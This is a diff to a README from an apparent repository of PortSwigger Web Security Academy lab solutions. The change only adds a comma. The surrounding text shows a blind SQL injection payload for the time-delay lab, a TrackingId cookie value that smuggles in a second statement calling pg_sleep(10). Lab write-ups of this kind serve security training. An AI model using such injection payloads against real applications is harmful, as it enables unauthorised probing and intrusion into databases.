blueorionn/portswigger-websecurity-academy-labs/01_SQL_Injection/14_Blind-SQL-injection-with-time-delays/README.md

 Since we don't know which database the application is running we have to try each of them one by one.

-*In my case the below payload worked.*
+*In my case, the below payload worked.*

 ```bash
 TrackingId=YOUR-TRACKING-ID'%3B+SELECT+pg_sleep(10)+--